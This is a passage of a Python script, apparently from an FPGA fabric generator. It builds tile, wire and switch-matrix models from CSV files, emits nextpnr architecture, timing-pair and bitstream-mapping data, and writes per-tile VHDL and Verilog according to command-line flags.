if sources[x+1] in pipsdict.keys():
pipsdict[sources[x+1]].append(sinks[y+1])
else:
pipsdict[sources[x+1]]= [sinks[y+1]]
else:
if sinks[y+1] in pipsdict.keys():
pipsdict[sinks[y+1]].append(sources[x+1])
else:
pipsdict[sinks[y+1]]= [sources[x+1]]
#return ""
if returnDict:
return pipsdict
return pips
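#Illustration with hypothetical port names: returnDict=False yields pairs such as
#[["N1BEG0", "E2END1"], ...]; returnDict=True with mapSourceToSinks=True yields
#{"N1BEG0": ["E2END1", ...], ...}, and with mapSourceToSinks=False the dict maps each sink to its sources.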
def genFabricObject(fabric: list):
#The following iterates through the tile designations on the fabric
archFabric = Fabric(len(fabric), len(fabric[0]))
portMap = {}
wireMap = {}
# for i, line in enumerate(fabric):
# for j, tile in enumerate(line):
# tileList = GetTileFromFile(FabricFile, tile)
# portList = []
# for wire in tileList:
# if wire[0] in ["NORTH", "SOUTH", "EAST", "WEST"]:
# if wire[1] != "NULL":
# portList.append(wire[1])
# if wire[4] != "NULL":
# portList.append(wire[4])
# portMap["I" + str(i) + "J" + str(j)] = portList
for i, line in enumerate(fabric):
row = []
for j, tile in enumerate(line):
cTile = Tile(tile)
wires = []
belList = []
tileList = GetTileFromFile(FabricFile, tile)
portList = []
wireTextList = []
for wire in tileList:
#Handle tile attributes depending on their label
if wire[0] == "MATRIX":
vhdlLoc = wire[1]
csvLoc = vhdlLoc[:-4:] + "csv"
cTile.matrixFileName = csvLoc
try:
csvFile = RemoveComments([i.strip('\n').split(',') for i in open(csvLoc)])
cTile.pips = findPipList(csvFile)
cTile.pipMuxes_MapSourceToSinks = findPipList(csvFile, returnDict = True, mapSourceToSinks = True)
cTile.pipMuxes_MapSinkToSources = findPipList(csvFile, returnDict = True, mapSourceToSinks = False)
except:
						raise Exception(f"Switch matrix CSV file {csvLoc} not found.")
if wire[0] == "BEL":
try:
ports = GetComponentPortsFromFile(wire[1])
except:
raise Exception(f"{wire[1]} file for BEL not found")
if len(wire) > 2:
prefix = wire[2]
else:
prefix = ""
nports = []
for port in ports[0]:
nports.append(prefix + re.sub(" *\(.*\) *", "", str(port)))
for port in ports[1]:
nports.append(prefix + re.sub(" *\(.*\) *", "", str(port)))
cTile.belPorts.update(nports)
belList.append([wire[1][0:-5:], prefix, nports])
elif wire[0] in ["NORTH", "SOUTH", "EAST", "WEST"]:
#Wires are added in next pass - this pass generates port lists to be used for wire generation
if wire[1] != "NULL":
portList.append(wire[1])
if wire[4] != "NULL":
portList.append(wire[4])
wireTextList.append({"direction": wire[0], "source": wire[1], "xoffset": wire[2], "yoffset": wire[3], "destination": wire[4], "wire-count": wire[5]})
elif wire[0] == "JUMP": #We just treat JUMPs as normal wires - however they're only on one tile so we can add them directly
if "NULL" not in wire:
wires.append({"direction": wire[0], "source": wire[1], "xoffset": wire[2], "yoffset": wire[3], "destination": wire[4], "wire-count": wire[5]})
cTile.wires = wires
cTile.x = j
cTile.y = archFabric.height - i -1
cTile.bels = belList
row.append(cTile)
portMap[cTile] = portList
wireMap[cTile] = wireTextList
archFabric.tiles.append(row)
#Add wires to model
for row in archFabric.tiles:
for tile in row:
wires = []
wireTextList = wireMap[tile]
tempAtomicWires = []
#Wires from tile
for wire in wireTextList:
destinationTile = archFabric.getTileByCoords(tile.x + int(wire["xoffset"]), tile.y + int(wire["yoffset"]))
if not ((destinationTile == None) or ("NULL" in wire.values()) or (wire["destination"] not in portMap[destinationTile])):
wires.append(wire)
portMap[destinationTile].remove(wire["destination"])
portMap[tile].remove(wire["source"])
elif destinationTile == None and not ("NULL" in wire.values()): #If the wire goes off the fabric then we account for cascading by finding the last tile the wire goes through
if int(wire["xoffset"]) != 0: #If we're moving in the x axis
if int(wire["xoffset"]) > 0:
offsetWalkback = -1 #Note we want to walk opposite to wire direction as we're trying to get back onto the fabric
elif int(wire["xoffset"]) < 0:
offsetWalkback = 1
walkbackCount = 0
cTile = destinationTile #Initialise to current dest tile
while cTile == None: #Exit when we're back on the fabric
walkbackCount += offsetWalkback #Step back another place
cTile = archFabric.getTileByCoords(tile.x + int(wire["xoffset"]) + walkbackCount, tile.y + int(wire["yoffset"])) #Check our current tile
totalOffset = int(wire["xoffset"]) + walkbackCount
cascadedBottom = (abs((int(wire["xoffset"]))) - (abs(totalOffset))) * int(wire["wire-count"])
for i in range(int(wire["wire-count"])):
tempAtomicWires.append({"direction": wire["direction"], "source": wire["source"] + str(i), "xoffset": wire["xoffset"], "yoffset": wire["yoffset"], "destination": wire["destination"] + str(i + cascadedBottom), "sourceTile": tile.genTileLoc(), "destTile": cTile.genTileLoc()}) #Add atomic wire names
					elif int(wire["yoffset"]) != 0: #If we're moving in the y axis
if int(wire["yoffset"]) > 0:
offsetWalkback = -1 #Note we want to walk opposite to wire direction as we're trying to get back onto the fabric
elif int(wire["yoffset"]) < 0:
offsetWalkback = 1
walkbackCount = 0
cTile = destinationTile #Initialise to current dest tile
while cTile == None: #Exit when we're back on the fabric
walkbackCount += offsetWalkback #Step back another place
cTile = archFabric.getTileByCoords(tile.x + int(wire["xoffset"]), tile.y + int(wire["yoffset"]) + walkbackCount) #Check our current tile
totalOffset = int(wire["yoffset"]) + walkbackCount
cascadedBottom = (abs((int(wire["yoffset"]))) - (abs(totalOffset))) * int(wire["wire-count"])
for i in range(int(wire["wire-count"])):
tempAtomicWires.append({"direction": wire["direction"], "source": wire["source"] + str(i), "xoffset": wire["xoffset"], "yoffset": wire["yoffset"], "destination": wire["destination"] + str(i + cascadedBottom), "sourceTile": tile.genTileLoc(), "destTile": cTile.genTileLoc()}) #Add atomic wire names
#Wires to tile
sourceTile = archFabric.getTileByCoords(tile.x - int(wire["xoffset"]), tile.y - int(wire["yoffset"]))
if (sourceTile == None) or ("NULL" in wire.values()) or (wire["source"] not in portMap[sourceTile]):
continue
sourceTile.wires.append(wire)
portMap[sourceTile].remove(wire["source"])
portMap[tile].remove(wire["destination"])
tile.wires.extend(wires)
tile.atomicWires = tempAtomicWires
archFabric.cellTypes = GetCellTypes(fabric)
return archFabric
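	#The returned Fabric holds one Tile per grid position, each with its coordinates, BEL list,
	#switch-matrix pips and inter-tile wires resolved (wires that run off the fabric edge are kept
	#as individual entries in atomicWires to model cascading/termination).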
def genNextpnrModel(archObject: Fabric, generatePairs = True):
pipsStr = ""
belsStr = f"# BEL descriptions: bottom left corner Tile_X0Y0, top right {archObject.tiles[0][archObject.width - 1].genTileLoc()}\n"
pairStr = ""
templateStr = "module template ();\n"
constraintStr = ""
for line in archObject.tiles:
for tile in line:
#Add PIPs
#Pips within the tile
tileLoc = tile.genTileLoc() #Get the tile location string
pipsStr += f"#Tile-internal pips on tile {tileLoc}:\n"
for pip in tile.pips:
pipsStr += ",".join((tileLoc, pip[0], tileLoc, pip[1],sDelay,".".join((pip[0], pip[1])))) #Add the pips (also delay should be done here later, sDelay is a filler)
pipsStr += "\n"
#Wires between tiles
pipsStr += f"#Tile-external pips on tile {tileLoc}:\n"
for wire in tile.wires:
desty = tile.y - int(wire["yoffset"])
#print(wire)
#print(str(tile.y)+', '+str(desty))
destx = tile.x + int(wire["xoffset"])
desttileLoc = f"X{destx}Y{desty}"
for i in range(int(wire["wire-count"])):
pipsStr += ",".join((tileLoc, wire["source"]+str(i), desttileLoc, wire["destination"]+str(i), sDelay, ".".join((wire["source"]+str(i), wire["destination"]+str(i)))))
pipsStr += "\n"
for wire in tile.atomicWires: #Very simple - just add wires using values directly from the atomic wire structure
desttileLoc = wire["destTile"]
pipsStr += ",".join((tileLoc, wire["source"], desttileLoc, wire["destination"], sDelay, ".".join((wire["source"], wire["destination"]))))
pipsStr += "\n"
#Add BELs
belsStr += "#Tile_" + tileLoc + "\n" #Tile declaration as a comment
for num, belpair in enumerate(tile.bels):
bel = belpair[0]
let = letters[num]
# if bel == "LUT4c_frame_config":
# cType = "LUT4"
# prefix = "L" + let + "_"
# elif bel == "IO_1_bidirectional_frame_config_pass":
# prefix = let + "_"
# else:
# cType = bel
# prefix = ""
prefix = belpair[1]
nports = belpair[2]
if bel == "LUT4c_frame_config":
cType = "FABULOUS_LC" #"LUT4"
#elif bel == "IO_1_bidirectional_frame_config_pass":
# cType = "IOBUF"
else:
cType = bel
belsStr += ",".join((tileLoc, ",".join(tile.genTileLoc(True)), let, cType, ",".join(nports))) + "\n"
#Add template - this just adds to a file to instantiate all IO as a primitive:
if bel == "IO_1_bidirectional_frame_config_pass":
templateStr += f"wire "
for i, port in enumerate(nports):
templateStr += f"Tile_{tileLoc}_{port}"
if i < len(nports) - 1:
templateStr += ", "
else:
templateStr += ";\n"
belName = f"Tile_{tileLoc}_{let}"
templateStr += f"(* keep *) IO_1_bidirectional_frame_config_pass {belName} (.O(Tile_{tileLoc}_{prefix}O), .Q(Tile_{tileLoc}_{prefix}Q), .I(Tile_{tileLoc}_{prefix}I));\n\n"
constraintStr += f"set_io {belName} {tileLoc}.{let}\n"
if bel == "InPass4_frame_config":
templateStr += f"wire "
for i, port in enumerate(nports):
templateStr += f"Tile_{tileLoc}_{port}"
if i < len(nports) - 1:
templateStr += ", "
else:
templateStr += ";\n"
belName = f"Tile_{tileLoc}_{let}"
templateStr += f"(* keep *) InPass4_frame_config {belName} (.O0(Tile_{tileLoc}_{prefix}O0), .O1(Tile_{tileLoc}_{prefix}O1), .O2(Tile_{tileLoc}_{prefix}O2), .O3(Tile_{tileLoc}_{prefix}O3));\n\n"
constraintStr += f"set_io {belName} {tileLoc}.{let}\n"
if bel == "OutPass4_frame_config":
templateStr += f"wire "
for i, port in enumerate(nports):
templateStr += f"Tile_{tileLoc}_{port}"
if i < len(nports) - 1:
templateStr += ", "
else:
templateStr += ";\n"
belName = f"Tile_{tileLoc}_{let}"
templateStr += f"(* keep *) OutPass4_frame_config {belName} (.I0(Tile_{tileLoc}_{prefix}I0), .I1(Tile_{tileLoc}_{prefix}I1), .I2(Tile_{tileLoc}_{prefix}I2), .I3(Tile_{tileLoc}_{prefix}I3));\n\n"
constraintStr += f"set_io {belName} {tileLoc}.{let}\n"
if generatePairs:
#Generate wire beginning to wire beginning pairs for timing analysis
print("Generating pairs for: " + tile.genTileLoc())
pairStr += "#" + tileLoc + "\n"
for wire in tile.wires:
for i in range(int(wire["wire-count"])):
desty = tile.y - int(wire["yoffset"])
destx = tile.x + int(wire["xoffset"])
destTile = archObject.getTileByCoords(destx, desty)
desttileLoc = f"X{destx}Y{desty}"
if (wire["destination"] + str(i)) not in destTile.pipMuxes_MapSourceToSinks.keys():
continue
for pipSink in destTile.pipMuxes_MapSourceToSinks[wire["destination"] + str(i)]:
#If there is a multiplexer here, then we can simply add this pair
if len(destTile.pipMuxes_MapSinkToSources[pipSink]) > 1:
pairStr += ",".join((".".join((tileLoc, wire["source"] + f"[{str(i)}]")), ".".join((desttileLoc, addBrackets(pipSink, tile))))) + "\n" #TODO: add square brackets to end
#otherwise, there is no physical pair in the ASIC netlist, so we must propagate back until we hit a multiplexer
else:
finalDestination = ".".join((desttileLoc, addBrackets(pipSink, tile)))
foundPhysicalPairs = False
curWireTuple = (tile, wire, i)
potentialStarts = []
stopOffs = []
while (not foundPhysicalPairs):
cTile = curWireTuple[0]
cWire = curWireTuple[1]
cIndex = curWireTuple[2]
if len(cTile.pipMuxes_MapSinkToSources[cWire["source"] + str(cIndex)]) > 1:
for wireEnd in cTile.pipMuxes_MapSinkToSources[cWire["source"] + str(cIndex)]:
if wireEnd in cTile.belPorts:
continue
cPair = archObject.getTileAndWireByWireDest(cTile.genTileLoc(), wireEnd)
if cPair == None:
continue
potentialStarts.append(cPair[0].genTileLoc() + "." + cPair[1]["source"] + "[" + str(cPair[2]) + "]")
foundPhysicalPairs = True
else:
destPort = cTile.pipMuxes_MapSinkToSources[cWire["source"] + str(cIndex)][0]
destLoc = cTile.genTileLoc()
if destPort in cTile.belPorts:
foundPhysicalPairs = True #This means it's connected to a BEL
continue
if GNDRE.match(destPort) or VCCRE.match(destPort):
foundPhysicalPairs = True
continue
stopOffs.append(destLoc + "." + destPort)
curWireTuple = archObject.getTileAndWireByWireDest(destLoc, destPort)
pairStr += "#Propagated route for " + finalDestination + "\n"
for index, start in enumerate(potentialStarts):
pairStr += start + "," + finalDestination + "\n"
pairStr += "#Stopoffs: " + ",".join(stopOffs) + "\n"
#Generate pairs for bels:
pairStr += "#Atomic wire pairs\n"
for wire in tile.atomicWires:
pairStr += wire["sourceTile"] + "." + addBrackets(wire["source"], tile) + "," + wire["destTile"] + "." + addBrackets(wire["destination"], tile) + "\n"
for num, belpair in enumerate(tile.bels):
pairStr += "#Bel pairs" + "\n"
bel = belpair[0]
let = letters[num]
prefix = belpair[1]
nports = belpair[2]
if bel == "LUT4c_frame_config":
							for outPip in tile.pipMuxes_MapSourceToSinks[prefix + "O"]:
								for i in range(4):
									pairStr += tileLoc + "." + prefix + f"D[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for i in range(4):
pairStr += tileLoc + "." + prefix + f"I[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + "." + prefix + f"Q[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "MUX8LUT_frame_config":
for outPip in tile.pipMuxes_MapSourceToSinks["M_AB"]:
pairStr += tileLoc + ".A," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".B," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S0," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks["M_AD"]:
pairStr += tileLoc + ".A," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".B," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".C," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".D," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S0," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S1," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks["M_AH"]:
pairStr += tileLoc + ".A," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".B," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".C," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".D," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".E," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".F," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".G," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".H," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S0," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S1," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S2," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S3," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks["M_EF"]:
pairStr += tileLoc + ".E," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".F," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S0," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S2," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "MULADD":
for i in range(20):
for outPip in tile.pipMuxes_MapSourceToSinks[f"Q{i}"]:
for i in range(8):
pairStr += tileLoc + f".A[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for i in range(8):
pairStr += tileLoc + f".B[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for i in range(20):
pairStr += tileLoc + f".C[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "RegFile_32x4":
for i in range(4):
for outPip in tile.pipMuxes_MapSourceToSinks[f"AD{i}"]:
pairStr += tileLoc + ".W_en," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for j in range(4):
pairStr += tileLoc + f".D[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + f".W_ADR[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + f".A_ADR[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks[f"BD{i}"]:
pairStr += tileLoc + ".W_en," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for j in range(4):
pairStr += tileLoc + f".D[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + f".W_ADR[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + f".B_ADR[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "IO_1_bidirectional_frame_config_pass":
#inPorts go into the fabric, outPorts go out
for inPort in ("O", "Q"):
for outPip in tile.pipMuxes_MapSourceToSinks[prefix + inPort]:
pairStr += tileLoc + "." + prefix + inPort + "," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
#Outputs are covered by the wire code, as pips will link to them
elif bel == "InPass4_frame_config":
for i in range(4):
for outPip in tile.pipMuxes_MapSourceToSinks[prefix + "O" + str(i)]:
pairStr += tileLoc + "." + prefix + f"O{i}" + "," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "OutPass4_frame_config":
for i in range(4):
for inPip in tile.pipMuxes_MapSinkToSources[prefix + "I" + str(i)]:
pairStr += tileLoc + "." + addBrackets(inPip, tile) + "," + tileLoc + "." + prefix + f"I{i}" + "\n"
templateStr += "endmodule"
if generatePairs:
return (pipsStr, belsStr, templateStr, constraintStr, pairStr)
else:
return (pipsStr, belsStr, templateStr, constraintStr)
def genBitstreamSpec(archObject: Fabric):
specData = {"TileMap":{}, "TileSpecs":{}, "FrameMap":{}, "ArchSpecs":{"MaxFramesPerCol":MaxFramesPerCol, "FrameBitsPerRow":FrameBitsPerRow}}
BelMap = {}
for line in archObject.tiles:
for tile in line:
specData["TileMap"][tile.genTileLoc()] = tile.tileType
#Generate mapping dicts for bel types:
#The format here is that each BEL has a dictionary that maps a fasm feature to another dictionary that maps bits to their values
#The lines generating the BEL maps do it slightly differently, just notating bits that should go high - this is translated further down
#We do not worry about bitmasking here - that's handled in the generation
#LUT4:
LUTmap = {}
LUTmap["INIT"] = 0 #Futureproofing as there are two ways that INIT[0] may be referred to (FASM parser will use INIT to refer to INIT[0])
for i in range(16):
LUTmap["INIT[" + str(i) + "]"] = i
LUTmap["FF"] = 16
LUTmap["IOmux"] = 17
BelMap["LUT4c_frame_config"] = LUTmap
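	#Reading of the map above: fasm feature "INIT[3]" drives LUT configuration bit 3, "FF" bit 16
	#and "IOmux" bit 17; these BEL-relative bit numbers are later shifted by curBitOffset and
	#translated into absolute frame-bit positions through encodeDict in the per-tile loop below.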
#MUX8
MUX8map = {"c0":0, "c1":1}
BelMap["MUX8LUT_frame_config"] = MUX8map
#MULADD
MULADDmap = {}
MULADDmap["A_reg"] = 0
MULADDmap["B_reg"] = 1
MULADDmap["C_reg"] = 2
MULADDmap["ACC"] = 3
MULADDmap["signExtension"] = 4
MULADDmap["ACCout"] = 5
BelMap["MULADD"] = MULADDmap
#InPass
InPassmap = {}
InPassmap["I0_reg"] = 0
InPassmap["I1_reg"] = 1
InPassmap["I2_reg"] = 2
InPassmap["I3_reg"] = 3
BelMap["InPass4_frame_config"] = InPassmap
#OutPass
OutPassmap = {}
OutPassmap["I0_reg"] = 0
OutPassmap["I1_reg"] = 1
OutPassmap["I2_reg"] = 2
OutPassmap["I3_reg"] = 3
BelMap["OutPass4_frame_config"] = OutPassmap
#RegFile
RegFilemap = {}
RegFilemap["AD_reg"] = 0
RegFilemap["BD_reg"] = 1
BelMap["RegFile_32x4"] = RegFilemap
BelMap["IO_1_bidirectional_frame_config_pass"] = {}
###NOTE: THIS METHOD HAS BEEN CHANGED FROM A PREVIOUS IMPLEMENTATION SO PLEASE BEAR THIS IN MIND
#To account for cascading and termination, this now creates a separate map for every tile, as opposed to every cellType
for row in archObject.tiles:
#curTile = getTileByType(archObject, cellType)
for curTile in row:
cellType = curTile.tileType
if cellType == "NULL":
continue
#Generate frame masks from ConfigMem
try:
configCSV = open(cellType + "_ConfigMem.csv") #This may need to be .init.csv, not just .csv
except:
print(f"No Config Mem csv file found for {cellType}. Assuming no config memory.")
#specData["FrameMap"][cellType] = {}
continue
configList = [i.strip('\n').split(',') for i in configCSV]
configList = RemoveComments(configList)
maskDict = {}
			encodeDict = [-1 for i in range(FrameBitsPerRow*MaxFramesPerCol)] #Maps each of this tile's config bit indices to its absolute frame-bit position, filled in from the ConfigMem csv below
for line in configList:
configEncode = []
maskDict[int(line[1])] = line[3].replace("_", "")
for index in line[4:]:
if ':' in index:
index_temp = index.split(':')
index_width = int(index_temp[0])-int(index_temp[1])+1
for i in range(index_width):
configEncode.append(str(int(index_temp[0])-i))
else:
configEncode.append(index)
encode_i = 0
for i,char in enumerate(maskDict[int(line[1])]):
if char != '0':
encodeDict[int(configEncode[encode_i])] = (31 - i) + ( 32 * int(line[1]))
encode_i += 1
#specData["FrameMap"][cellType] = maskDict
# if specData["ArchSpecs"]["MaxFramesPerCol"] < int(line[1]) + 1:
# specData["ArchSpecs"]["MaxFramesPerCol"] = int(line[1]) + 1
# if specData["ArchSpecs"]["FrameBitsPerRow"] < int(line[2]):
# specData["ArchSpecs"]["FrameBitsPerRow"] = int(line[2])
configCSV.close()
curBitOffset = 0
curTileMap = {}
for i, belPair in enumerate(curTile.bels): #Add the bel features we made a list of earlier
tempOffset = 0
name = letters[i]
belType = belPair[0]
for featureKey in BelMap[belType]:
curTileMap[name + "." +featureKey] = {encodeDict[BelMap[belType][featureKey] + curBitOffset]: "1"} #We convert to the desired format like so
if featureKey != "INIT":
tempOffset += 1
curBitOffset += tempOffset
csvFile = [i.strip('\n').split(',') for i in open(curTile.matrixFileName)]
pipCounts = [int(row[-1]) for row in csvFile[1::]]
csvFile = RemoveComments(csvFile)
sinks = [line[0] for line in csvFile]
sources = csvFile[0]
pips = []
pipsdict = {}
for y, row in enumerate(csvFile[1::]): #Config bits for switch matrix from file
muxList = []
pipCount = pipCounts[y]
for x, value in enumerate(row[1::]):
#Remember that x and y are offset
if value == "1":
muxList.append(".".join((sources[x+1], sinks[y+1])))
muxList.reverse() #Order is flipped
for i, pip in enumerate(muxList):
controlWidth = int(numpy.ceil(numpy.log2(pipCount)))
if pipCount < 2:
curTileMap[pip] = {}
continue
pip_index = pipCount-i-1
controlValue = f"{pip_index:0{controlWidth}b}"
tempOffset = 0
for curChar in controlValue[::-1]:
if pip not in curTileMap.keys():
curTileMap[pip] = {}
curTileMap[pip][encodeDict[curBitOffset + tempOffset]] = curChar
tempOffset += 1
curBitOffset += controlWidth
for wire in curTile.wires: #And now we add empty config bit mappings for immutable connections (i.e. wires), as nextpnr sees these the same as normal pips
for count in range(int(wire["wire-count"])):
wireName = ".".join((wire["source"] + str(count), wire["destination"] + str(count)))
curTileMap[wireName] = {} #Tile connection wires are seen as pips by nextpnr for ease of use, so this makes sure those pips still have corresponding keys
for wire in curTile.atomicWires:
wireName = ".".join((wire["source"], wire["destination"]))
curTileMap[wireName] = {}
specData["TileSpecs"][curTile.genTileLoc()] = curTileMap
return specData
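	#Layout of the returned dict: "TileMap" maps tile locations to tile types, "TileSpecs" maps each
	#location to {fasm feature: {frame bit index: bit value}}, "ArchSpecs" records MaxFramesPerCol and
	#FrameBitsPerRow, and "FrameMap" is reserved but left unfilled here.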
#####################################################################################
# Main
#####################################################################################
# read fabric description as a csv file (Excel uses tabs '\t' instead of ',')
print('### Read Fabric csv file ###')
FabricFile = [i.strip('\n').split(',') for i in open('fabric.csv')]
fabric = GetFabric(FabricFile) #filter = 'Fabric' is default to get the definition between 'FabricBegin' and 'FabricEnd'
# the next isn't very elegant, but it works...
# I wanted to store parameters in our fabric csv between a block 'ParametersBegin' and ParametersEnd'
ParametersFromFile = GetFabric(FabricFile, filter = 'Parameters')
for item in ParametersFromFile:
# if the first element is the variable name, then overwrite the variable state with the second element, otherwise it would leave the default
if 'ConfigBitMode' == item[0]:
ConfigBitMode = item[1]
elif 'FrameBitsPerRow' == item[0]:
FrameBitsPerRow = int(item[1])
elif 'Package' == item[0]:
Package = int(item[1])
elif 'MaxFramesPerCol' == item[0]:
MaxFramesPerCol = int(item[1])
elif 'GenerateDelayInSwitchMatrix' == item[0]:
GenerateDelayInSwitchMatrix = int(item[1])
elif 'MultiplexerStyle' == item[0]:
MultiplexerStyle = item[1]
else:
raise ValueError('\nError: unknown parameter "'+item[0]+'" in fabric csv at section ParametersBegin\n')
### # from StackOverflow config.get("set", "var_name")
### #ConfigBitMode frame_based
### # config.get("frame_based", "ConfigBitMode")
### config = ConfigParser.ConfigParser()
### config.read("fabric.ini")
### var_a = config.get("myvars", "var_a")
### var_b = config.get("myvars", "var_b")
### var_c = config.get("myvars", "var_c")
print('DEBUG Parameters: ', ConfigBitMode, FrameBitsPerRow)
TileTypes = GetCellTypes(fabric)
# The original plan was to do something super generic where tiles can be arbitrarily defined.
# However, that would have led to a heterogeneous/flat FPGA fabric as each tile may have different sets of wires to route.
# If we say that a wire is defined by/in its source cell then that implies how many wires get routed through adjacent neighbouring tiles.
# To keep things simple, we left this all out and the wiring between tiles is the same (for the first shot)
print('### Script command arguments are:\n' , str(sys.argv))
if ('-GenTileSwitchMatrixCSV'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate initial switch matrix template (has to be bootstrapped first)')
for tile in TileTypes:
print('### generate csv for tile ', tile, ' # filename:', (str(tile)+'_switch_matrix.csv'))
TileFileHandler = open(str(tile)+'_switch_matrix.csv','w')
TileInformation = GetTileFromFile(FabricFile,str(tile))
BootstrapSwitchMatrix(TileInformation,str(tile),(str(tile)+'_switch_matrix.csv'))
TileFileHandler.close()
if ('-GenTileSwitchMatrixVHDL'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate initial switch matrix VHDL code')
for tile in TileTypes:
print('### generate VHDL for tile ', tile, ' # filename:', (str(tile)+'_switch_matrix.vhdl'))
TileFileHandler = open(str(tile)+'_switch_matrix.vhdl','w+')
GenTileSwitchMatrixVHDL(tile,(str(tile)+'_switch_matrix.csv'),TileFileHandler)
TileFileHandler.close()
if ('-GenTileSwitchMatrixVerilog'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate initial switch matrix Verilog code')
for tile in TileTypes:
print('### generate Verilog for tile ', tile, ' # filename:', (str(tile)+'_switch_matrix.v'))
TileFileHandler = open(str(tile)+'_switch_matrix.v','w+')
GenTileSwitchMatrixVerilog(tile,(str(tile)+'_switch_matrix.csv'),TileFileHandler)
TileFileHandler.close()
if ('-GenTileConfigMemVHDL'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate all tile HDL descriptions')
for tile in TileTypes:
print('### generate configuration bitstream storage VHDL for tile ', tile, ' # filename:', (str(tile)+'_ConfigMem.vhdl'))
# TileDescription = GetTileFromFile(FabricFile,str(tile))
# TileVHDL_list = GenerateTileVHDL_list(FabricFile,str(tile))
# I tried various "from StringIO import StringIO" all not working - gave up
TileFileHandler = open(str(tile)+'_ConfigMem.vhdl','w+')
TileInformation = GetTileFromFile(FabricFile,str(tile))
GenerateConfigMemVHDL(TileInformation,str(tile)+'_ConfigMem',TileFileHandler)
TileFileHandler.close()
if ('-GenTileConfigMemVerilog'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
#print('### Generate all tile HDL descriptions')
for tile in TileTypes:
print('### generate configuration bitstream storage Verilog for tile ', tile, ' # filename:', (str(tile)+'_ConfigMem.v'))
# TileDescription = GetTileFromFile(FabricFile,str(tile))
# TileVHDL_list = GenerateTileVHDL_list(FabricFile,str(tile))
# I tried various "from StringIO import StringIO" all not working - gave up
TileFileHandler = open(str(tile)+'_ConfigMem.v','w+')
TileInformation = GetTileFromFile(FabricFile,str(tile))
GenerateConfigMemVerilog(TileInformation,str(tile)+'_ConfigMem',TileFileHandler)
TileFileHandler.close()
if ('-GenTileHDL'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate all tile HDL descriptions')
for tile in TileTypes:
print('### generate VHDL for tile ', tile, ' # filename:', (str(tile)+'_tile.vhdl'))
# TileDescription = GetTileFromFile(FabricFile,str(tile))
# TileVHDL_list = GenerateTileVHDL_list(FabricFile,str(tile))
# I tried various "from StringIO import StringIO" all not working - gave up
TileFileHandler = open(str(tile)+'_tile.vhdl','w+')
TileInformation = GetTileFromFile(FabricFile,str(tile))
GenerateTileVHDL(TileInformation,str(tile),TileFileHandler)
TileFileHandler.close()
if ('-GenTileVerilog'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
#print('### Generate all tile Verilog descriptions')
for tile in TileTypes:
print('### generate Verilog for tile ', tile, ' # filename:', (str(tile)+'_tile.v'))
# TileDescription = GetTileFromFile(FabricFile,str(tile))
# TileVHDL_list = GenerateTileVHDL_list(FabricFile,str(tile))
# I tried various "from StringIO import StringIO" all not working - gave up
TileFileHandler = open(str(tile)+'_tile.v','w+')
TileInformation = GetTileFromFile(FabricFile,str(tile))
